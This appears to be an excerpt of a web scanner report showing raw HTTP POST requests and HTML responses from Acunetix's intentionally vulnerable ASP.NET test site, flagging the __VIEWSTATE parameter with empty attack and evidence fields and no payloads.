Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8313&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAA4ItkptoIZGRkHNHncpSpihPfqLXxdWijgWnDu0M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLrq5L%2BDALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gKpdcLP1GA1jFVlrdtXlKioRH5WmQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:56 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAA4ItkptoIZGRkHNHncpSpihPfqLXxdWijgWnDu0M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLrq5L+DALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gKpdcLP1GA1jFVlrdtXlKioRH5WmQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:White" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8317&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAAhzWJqdoIZGRkmK4Kw9LWSmdLyKFIUFyjewL5BFk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLbxpHyAwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gL%2B3cS%2FEZzVS02YiTJsPpHexRuQng%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:35 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAAhzWJqdoIZGRkmK4Kw9LWSmdLyKFIUFyjewL5BFk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLbxpHyAwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gL+3cS/EZzVS02YiTJsPpHexRuQng==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:White" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
